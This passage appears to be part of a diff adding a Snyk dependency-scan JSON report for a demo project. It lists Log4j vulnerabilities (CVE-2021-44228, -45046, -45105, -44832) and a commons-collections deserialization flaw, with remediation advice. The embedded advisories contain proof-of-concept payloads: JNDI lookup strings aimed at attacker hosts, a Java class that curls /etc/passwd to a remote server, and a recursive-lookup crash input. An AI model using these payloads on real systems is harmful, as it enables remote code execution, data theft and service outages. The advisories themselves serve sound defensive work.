"org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", + "title": "Apache Jira Issues" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", + "title": "Apache Jira Issues" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/logging-log4j2/pull/608", + "title": "GitHub PR" + }, + { + "url": 
"https://github.com/Kirill89/log4shell-vulnerable-server", + "title": "PoC" + }, + { + "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", + "title": "Snyk Blog and Vulnerability Breakdown" + }, + { + "url": "https://www.exploit-db.com/exploits/51183", + "title": "Exploit DB" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:43.264835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:46.605332Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.520882Z" + } + ], + "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI 
features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. 
If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", + "epssDetails": { + "percentile": "0.99999", + "probability": "0.97556", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44228" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-jfh8-c2jp-5v3q" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-10T10:08:46.155884Z", + "functions_new": [ + { + "version": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.15.0)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.lookup.JndiLookup", + 
"functionName": "lookup" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-12-10T10:02:55Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-10T10:10:01Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.500242Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.2)", + "[2.13.0,2.16.0)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.1", + "2.12.2", + "2.16.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", + "title": "Apache Pony Mail" + }, + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://twitter.com/marcioalm/status/1471740771581652995", + "title": "Twitter Post" + }, + { + "url": 
"https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", + "title": "Nuclei Templates" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9, + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:32.295395Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.455756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:56.296034Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. 
Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.16.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": 
false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. 
\r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.0" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + 
"2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", 
+ "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-client@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.14.1" + } + ], + "ok": false, + "dependencyCount": 2, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" 
+ }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "4 vulnerable dependency paths", + "remediation": { + "unresolved": [], + "upgrade": { + "org.apache.logging.log4j:log4j-core@2.14.1": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.14.1", + "org.apache.logging.log4j:log4j-core@2.14.1", + "org.apache.logging.log4j:log4j-core@2.14.1", + "org.apache.logging.log4j:log4j-core@2.14.1" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 4, + "projectName": "io.snyk:log4shell-client", + "foundProjectCount": 7, + "displayTargetFile": "log4shell-goof/log4shell-client/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + 
"triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 